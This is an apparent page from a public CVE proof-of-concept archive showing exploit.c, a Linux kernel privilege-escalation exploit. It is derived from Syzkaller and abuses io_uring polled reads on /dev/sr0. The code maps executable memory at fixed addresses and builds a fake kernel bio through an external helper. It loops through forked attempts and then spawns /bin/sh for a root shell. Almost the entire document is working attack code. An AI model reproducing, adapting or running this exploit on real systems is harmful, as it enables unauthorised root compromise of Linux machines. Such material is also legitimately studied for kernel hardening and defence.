4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.c C
// Originally generated by Syzkaller, optimized by us
#define _GNU_SOURCE 

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>
#include <assert.h>
#include <stddef.h>
#include "io_uring.h"

#define FLAG_IORING_SETUP_IOPOLL ((1))
#define RING ((0x20000240ULL))
#define SQES ((0x20000040ULL))
#define IO_URING_PARAMS ((0x20000080ULL))

#define RING_VMA ((0x20ffd000))
#define SQES_VMA ((0x20ffc000))

#ifndef __NR_io_uring_enter
#define __NR_io_uring_enter 426
#endif
#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup 425
#endif

#define BOUNCE_ADDR 0x30000000ul

static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
    if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
        exit(sig);
    }
    uintptr_t addr = (uintptr_t)info->si_addr;
    const uintptr_t prog_start = 1 << 20;
    const uintptr_t prog_end = 100 << 20;
    int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
    int valid = addr < prog_start || addr > prog_end;
    if (skip && valid) {
        _longjmp(segv_env, 1);
    }
    exit(sig);
}

static void install_segv_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = SIG_IGN;
    syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
    syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
    memset(&sa, 0, sizeof(sa));
    sa.sa_sigaction = segv_handler;
    sa.sa_flags = SA_NODEFER | SA_SIGINFO;
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...) ({ int ok = 1; __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); if (_setjmp(segv_env) == 0) { __VA_ARGS__; } else ok = 0; __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); ok; })

static void sleep_ms(uint64_t ms)
{
    usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
    struct timespec ts;
    if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
    return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static bool write_file(const char* file, const char* what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len) {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}

#define SIZEOF_IO_URING_SQE 64
#define SIZEOF_IO_URING_CQE 16
#define SQ_HEAD_OFFSET 0
#define SQ_TAIL_OFFSET 64
#define SQ_RING_MASK_OFFSET 256
#define SQ_RING_ENTRIES_OFFSET 264
#define SQ_FLAGS_OFFSET 276
#define SQ_DROPPED_OFFSET 272
#define CQ_HEAD_OFFSET 128
#define CQ_TAIL_OFFSET 192
#define CQ_RING_MASK_OFFSET 260
#define CQ_RING_ENTRIES_OFFSET 268
#define CQ_RING_OVERFLOW_OFFSET 284
#define CQ_FLAGS_OFFSET 280
#define CQ_CQES_OFFSET 320

// #define IORING_OFF_SQ_RING 0
#define IORING_OFF_SQES 0x10000000ULL

// Returns file descriptor to the ioring
static long syz_io_uring_setup(volatile long a0, volatile long a1, volatile long a2, volatile long a3, volatile long a4, volatile long a5)
{
    uint32_t entries = (uint32_t)a0;
    struct io_uring_params* setup_params = (struct io_uring_params*)a1;
    void* vma1 = (void*)a2;
    void* vma2 = (void*)a3;
    void** ring_ptr_out = (void**)a4;
    void** sqes_ptr_out = (void**)a5;
    uint32_t fd_io_uring = syscall(__NR_io_uring_setup, entries, setup_params);
    uint32_t sq_ring_sz = setup_params->sq_off.array + setup_params->sq_entries * sizeof(uint32_t);
    uint32_t cq_ring_sz = setup_params->cq_off.cqes + setup_params->cq_entries * SIZEOF_IO_URING_CQE;
    uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
    *ring_ptr_out = mmap(vma1, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE | MAP_FIXED, fd_io_uring, IORING_OFF_SQ_RING);
    uint32_t sqes_sz = setup_params->sq_entries * SIZEOF_IO_URING_SQE;
    *sqes_ptr_out = mmap(vma2, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE | MAP_FIXED, fd_io_uring, IORING_OFF_SQES);
    return fd_io_uring;
}

// Append a SQ entry to the ring
static long syz_io_uring_submit(volatile long a0, volatile long a1, volatile long a2, volatile long a3)
{
    char* ring_ptr = (char*)a0;
    char* sqes_ptr = (char*)a1;
    char* sqe = (char*)a2;
    uint32_t sqes_index = (uint32_t)a3;
    uint32_t sq_ring_entries = *(uint32_t*)(ring_ptr + SQ_RING_ENTRIES_OFFSET);
    uint32_t cq_ring_entries = *(uint32_t*)(ring_ptr + CQ_RING_ENTRIES_OFFSET);
    uint32_t sq_array_off = (CQ_CQES_OFFSET + cq_ring_entries * SIZEOF_IO_URING_CQE + 63) & ~63;
    if (sq_ring_entries)
        sqes_index %= sq_ring_entries;
    char* sqe_dest = sqes_ptr + sqes_index * SIZEOF_IO_URING_SQE;
    memcpy(sqe_dest, sqe, SIZEOF_IO_URING_SQE);
    uint32_t sq_ring_mask = *(uint32_t*)(ring_ptr + SQ_RING_MASK_OFFSET);
    uint32_t* sq_tail_ptr = (uint32_t*)(ring_ptr + SQ_TAIL_OFFSET);
    uint32_t sq_tail = *sq_tail_ptr & sq_ring_mask;
    uint32_t sq_tail_next = *sq_tail_ptr + 1;
    uint32_t* sq_array = (uint32_t*)(ring_ptr + sq_array_off);
    *(sq_array + sq_tail) = sqes_index;
    __atomic_store_n(sq_tail_ptr, sq_tail_next, __ATOMIC_RELEASE);
    return 0;
}

static void kill_and_wait(int pid, int* status)
{
    kill(-pid, SIGKILL);
    kill(pid, SIGKILL);
    for (int i = 0; i < 100; i++) {
        if (waitpid(-1, status, WNOHANG | __WALL) == pid)
            return;
        usleep(1000);
    }
    DIR* dir = opendir("/sys/fs/fuse/connections");
    if (dir) {
        for (;;) {
            struct dirent* ent = readdir(dir);
            if (!ent)
                break;
            if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
                continue;
            char abort[300];
            snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
            int fd = open(abort, O_WRONLY);
            if (fd == -1) {
                continue;
            }
            if (write(fd, abort, 1) < 0) {
            }
            close(fd);
        }
        closedir(dir);
    } else {
    }
    while (waitpid(-1, status, __WALL) != pid) {
    }
}

static void setup_test()
{
    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); //sets the behavior for when the parent thread dies, sets it to sigkill itself
    setpgrp(); // sets group ID of calling process to the PID... not sure what this is for though?
    write_file("/proc/self/oom_score_adj", "1000");
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

static void loop(void)
{
    int iter = 0;
    for (;; iter++) {
        int pid = fork();
        if (pid < 0)
    exit(1);
        if (pid == 0) {
            setup_test();
            execute_one();
            exit(0);
            while(true);
        }
        int status = 0;
        uint64_t start = current_time_ms();
        for (;;) {
            if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
                break;
            sleep_ms(1);
            if (current_time_ms() - start < 5000)
                continue;
            kill_and_wait(pid, &status);
            break;
        }
        if (iter >= 1) {
            // Need to try a shell after enough iters have passed for success,
            // but not too many as to accidentally hit an un-sprayed value and crash
            system("/bin/sh");
        }
    }
}

#define IO_URING_FD_OFFSET ((0))
#define RING_OFFSET ((1))
#define SQES_OFFSET ((2))

uint64_t r[4] = {0xffffffffffffffff, 0x0, 0x0, 0xffffffffffffffff};

void execute_one(void)
{
    intptr_t res = 0;
    // Install initial parameters / setup the io_uring
    struct io_uring_params *params = (struct io_uring_params *)IO_URING_PARAMS;
    params->sq_entries = 0;
    params->cq_entries = 0;
    params->flags = FLAG_IORING_SETUP_IOPOLL;
    params->sq_thread_cpu = 0;
    params->sq_thread_idle = 0;
    memset(&(params->resv), 0, sizeof(params->resv));
    res = -1;
    res = syz_io_uring_setup(1, IO_URING_PARAMS, RING_VMA, SQES_VMA, RING, SQES);
    
    if (res != -1) {
        r[IO_URING_FD_OFFSET] = res;
        r[RING_OFFSET] = *(uint64_t*)RING;
        r[SQES_OFFSET] = *(uint64_t*)SQES;
    }

    // Reuse the params struct to open /dev/sr0
    // /dev/sr0 is a SCSI CD ROM
    // This opens the CD ROM so we can interact with it using async block IO
    memcpy((void*)IO_URING_PARAMS, "/dev/sr0\000", 9);
    uint64_t dirfd = 0xffffffffffffff9cul;
    uint64_t flags = O_DIRECT | O_NONBLOCK | O_NOCTTY;
    assert(flags == 0x4900ul);
    syscall(__NR_openat, dirfd, IO_URING_PARAMS, flags, NULL);

    // Setup a SQ entry
    assert(offsetof(struct io_uring_sqe, opcode) == 0x20000100 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, fd) == 0x20000104 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, addr) == 0x20000110 - 0x20000100);
    assert(offsetof(struct io_uring_sqe, len) == 0x20000118 - 0x20000100);

    struct io_uring_sqe *new_entry = (struct io_uring_sqe *)(0x20000100);

    new_entry->opcode = IORING_OP_READ;
    assert(new_entry->opcode == 0x16);
    new_entry->fd = 4;
    new_entry->addr = 0x20000000;
    new_entry->len = 0xfffffd61;
    new_entry->file_index = 0;
    new_entry->__pad2[0] = 0;
    new_entry->__pad2[1] = 0;

    // Submit to index 0
    syz_io_uring_submit(r[RING_OFFSET], r[SQES_OFFSET], new_entry, 0);

    // This is in IO_URING_PARAMS again:
    // POLLING mode == kernel and user share memory and the kernel async reads from it
    params->sq_entries = 0;
    params->cq_entries = 0;
    params->flags = FLAG_IORING_SETUP_IOPOLL;
    params->sq_thread_cpu = 0;
    params->sq_thread_idle = 0;
    memset(&(params->resv), 0, sizeof(params->resv));
    NONFAILING(syz_io_uring_setup(1, IO_URING_PARAMS, RING_VMA, SQES_VMA, RING, 0));

    // Enter our ring to the io uring
    syscall(__NR_io_uring_enter, r[IO_URING_FD_OFFSET], 0x7e93, 0x5cab, 2ul, 0ul, 0ul);
}

extern void setup_fake_bio(uint64_t addr);

int main(void)
{
    // Setup three memory regions for us to use
    // Most of the fun stuff happens in the second one
    // In fact, mmap's 1 and 3 are not even needed :)
    uint64_t mmap_flags = MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS;
    assert(mmap_flags == 0x32ul);
    assert(PROT_NONE == 0ul);
    assert(PROT_READ | PROT_WRITE | PROT_EXEC == 7ul);

    // mmap(0x1ffff000ul, 0x1000ul, PROT_NONE, mmap_flags, -1, 0);
    mmap(0x20000000ul, 0x1000000ul, PROT_READ | PROT_WRITE | PROT_EXEC, mmap_flags, -1, 0ul);
    // mmap(0x21000000ul, 0x1000ul, PROT_NONE, mmap_flags, -1, 0ul);

    int retval = mmap(BOUNCE_ADDR, 0x1000000ul, PROT_READ | PROT_WRITE | PROT_EXEC, mmap_flags, -1, 0ul);
    char *ptr = (char *)BOUNCE_ADDR;
    ptr[0] = 'A';
    if (retval < 0) {
        perror("Error mmap'ing launchpad page\n");
        exit(EXIT_FAILURE);
    }
    setup_fake_bio(BOUNCE_ADDR);
    // memset(BOUNCE_ADDR, 'A', 0x1000000ul);

    install_segv_handler();
    loop();
    return 0;
}